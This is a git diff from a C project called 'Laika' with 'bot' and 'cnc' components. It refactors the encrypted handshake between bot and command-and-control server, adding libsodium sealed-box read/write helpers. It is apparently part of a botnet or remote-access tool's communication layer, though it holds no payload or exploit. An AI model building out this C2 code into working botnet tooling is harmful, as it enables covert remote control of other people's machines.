diff --git a/bot/src/bot.c b/bot/src/bot.c index 97d025a..4526c0f 100644 --- a/bot/src/bot.c +++ b/bot/src/bot.c @@ -4,7 +4,7 @@ #include "bot.h" LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = { - [LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE + [LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE) }; void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { @@ -12,12 +12,12 @@ void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { switch (id) { case LAIKAPKT_HANDSHAKE_RES: { - uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE]; + uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)], nonce[LAIKA_NONCESIZE]; uint8_t endianness = laikaS_readByte(&peer->sock); /* read & decrypt nonce */ laikaS_read(&peer->sock, encNonce, sizeof(encNonce)); - if (crypto_box_seal_open(nonce, encNonce, crypto_box_SEALBYTES + LAIKA_NONCESIZE, bot->pub, bot->priv) != 0) + if (crypto_box_seal_open(nonce, encNonce, LAIKAENC_SIZE(LAIKA_NONCESIZE), bot->pub, bot->priv) != 0) LAIKA_ERROR("Failed to decrypt nonce!\n"); /* check nonce */ @@ -57,6 +57,7 @@ struct sLaika_bot *laikaB_newBot(void) { LAIKA_ERROR("Failed to gen keypair!\n"); } + /* read cnc's public key into peerPub */ if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) { laikaB_freeBot(bot); LAIKA_ERROR("Failed to init cnc public key!\n"); @@ -74,7 +75,6 @@ void laikaB_freeBot(struct sLaika_bot *bot) { } void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) { - uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; struct sLaika_socket *sock = &bot->peer->sock; /* setup socket */ @@ -83,16 +83,12 @@ void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) { laikaP_addSock(&bot->pList, sock); - /* encrypt nonce using cnc's pubkey */ - if (crypto_box_seal(encNonce, bot->nonce, sizeof(bot->nonce), bot->peer->peerPub) != 0) - LAIKA_ERROR("Failed to enc nonce!\n"); - /* queue handshake request */ laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ); laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN); laikaS_writeByte(sock, LAIKA_VERSION_MAJOR); laikaS_writeByte(sock, LAIKA_VERSION_MINOR); - laikaS_write(sock, encNonce, sizeof(encNonce)); /* write encrypted nonce test */ + laikaS_writeENC(sock, bot->nonce, LAIKA_NONCESIZE, bot->peer->peerPub); /* write encrypted nonce test */ laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */ if (!laikaS_handlePeerOut(bot->peer)) diff --git a/bot/src/main.c b/bot/src/main.c index 92802f3..37c6cf9 100644 --- a/bot/src/main.c +++ b/bot/src/main.c @@ -12,11 +12,11 @@ int main(int argv, char **argc) { /* while connection is still alive, poll bot */ while (laikaS_isAlive((&bot->peer->sock))) { if (!laikaB_poll(bot, 1000)) { - printf("no events!\n"); + LAIKA_DEBUG("no events!\n"); } } laikaB_freeBot(bot); - printf("bot killed\n"); + LAIKA_DEBUG("bot killed\n"); return 0; } \ No newline at end of file diff --git a/cnc/src/cnc.c b/cnc/src/cnc.c index c021968..c785d1e 100644 --- a/cnc/src/cnc.c +++ b/cnc/src/cnc.c @@ -6,7 +6,7 @@ #include "cnc.h" LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = { - [LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE + crypto_box_PUBLICKEYBYTES + [LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE) + crypto_box_PUBLICKEYBYTES }; void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { @@ -15,7 +15,7 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { switch (id) { case LAIKAPKT_HANDSHAKE_REQ: { char magicBuf[LAIKA_MAGICLEN]; - uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE]; + uint8_t nonce[LAIKA_NONCESIZE]; uint8_t major, minor; laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN); @@ -28,21 +28,15 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { LAIKA_ERROR("invalid handshake request!\n"); /* read & decrypt nonce */ - laikaS_read(&peer->sock, encNonce, sizeof(encNonce)); - if (crypto_box_seal_open(nonce, encNonce, sizeof(encNonce), cnc->pub, cnc->priv) != 0) - LAIKA_ERROR("Failed to decrypt nonce!\n"); + laikaS_readENC(&peer->sock, nonce, LAIKA_NONCESIZE, cnc->pub, cnc->priv); /* read peer's public key */ laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub)); - /* encrypt decrypted nonce with peer's pub key */ - if (crypto_box_seal(encNonce, nonce, sizeof(nonce), peer->peerPub) != 0) - LAIKA_ERROR("Failed to enc nonce!\n"); - /* queue response */ laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES); laikaS_writeByte(&peer->sock, laikaS_isBigEndian()); - laikaS_write(&peer->sock, encNonce, sizeof(encNonce)); + laikaS_writeENC(&peer->sock, nonce, LAIKA_NONCESIZE, peer->peerPub); /* encrypt nonce with peer's public key */ LAIKA_DEBUG("accepted handshake from peer %x\n", peer); break; diff --git a/lib/include/lpacket.h b/lib/include/lpacket.h index f96faab..c6e4475 100644 --- a/lib/include/lpacket.h +++ b/lib/include/lpacket.h @@ -14,15 +14,19 @@ enum { * uint8_t laikaMagic[LAIKA_MAGICLEN]; * uint8_t majorVer; * uint8_t minorVer; - * uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using shared pubKey + * uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using shared pubKey * uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with */ LAIKAPKT_HANDSHAKE_RES, /* layout of LAIKAPKT_HANDSHAKE_RES: * uint8_t endian; - * uint8_t reEncryptedNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt + * uint8_t reEncryptedNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt */ LAIKAPKT_VARPKT_REQ, + /* layout of LAIKAPKT_VARPKT_REQ: + * uint8_t pktID; + * uint16_t pktSize; + */ LAIKAPKT_MAXNONE }; diff --git a/lib/include/lrsa.h b/lib/include/lrsa.h index 517a754..72555a6 100644 --- a/lib/include/lrsa.h +++ b/lib/include/lrsa.h @@ -3,4 +3,6 @@ #include "sodium.h" +#define LAIKAENC_SIZE(sz) (sz + crypto_box_SEALBYTES) + #endif diff --git a/lib/include/lsocket.h b/lib/include/lsocket.h index a76c4b5..6e6f448 100644 --- a/lib/include/lsocket.h +++ b/lib/include/lsocket.h @@ -86,6 +86,8 @@ bool laikaS_setNonBlock(struct sLaika_socket *sock); void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */ +void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub); /* encrypts & writes from buf */ +void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv); /* decrypts & reads to buf */ void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data); uint8_t laikaS_readByte(struct sLaika_socket *sock); void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */ diff --git a/lib/src/lpeer.c b/lib/src/lpeer.c index 983a570..fc11c97 100644 --- a/lib/src/lpeer.c +++ b/lib/src/lpeer.c @@ -58,9 +58,10 @@ bool laikaS_handlePeerIn(struct sLaika_peer *peer) { if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE)) LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ") + /* read pktID */ peer->pktID = laikaS_readByte(&peer->sock); - /* sanity check packet ID, (check valid range, check it's variadic) */ + /* sanity check pktID, (check valid range, check it's variadic) */ if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID]) LAIKA_ERROR("received evil pktID!\n") diff --git a/lib/src/lsocket.c b/lib/src/lsocket.c index f612086..3a18f9c 100644 --- a/lib/src/lsocket.c +++ b/lib/src/lsocket.c @@ -3,6 +3,7 @@ #include "lerror.h" #include "lmem.h" #include "lpolllist.h" +#include "lrsa.h" #include "lsocket.h" static int _LNSetup = 0; @@ -184,6 +185,25 @@ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz) { sock->outCount += sz; } +void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub) { + /* make sure we have enough space to encrypt the buffer */ + laikaM_growarray(uint8_t, sock->outBuf, LAIKAENC_SIZE(sz), sock->outCount, sock->outCap); + + /* encrypt the buffer into outBuf */ + if (crypto_box_seal(&sock->outBuf[sock->outCount], buf, sz, pub) != 0) + LAIKA_ERROR("Failed to encrypt!"); + + sock->outCount += LAIKAENC_SIZE(sz); +} + +void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv) { + /* decrypt into buf */ + if (crypto_box_seal_open(buf, sock->inBuf, LAIKAENC_SIZE(sz), pub, priv) != 0) + LAIKA_ERROR("Failed to decrypt!"); + + laikaM_rmvarray(uint8_t, sock->inBuf, sock->inCount, 0, LAIKAENC_SIZE(sz)); +} + void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) { laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap); sock->outBuf[sock->outCount++] = data;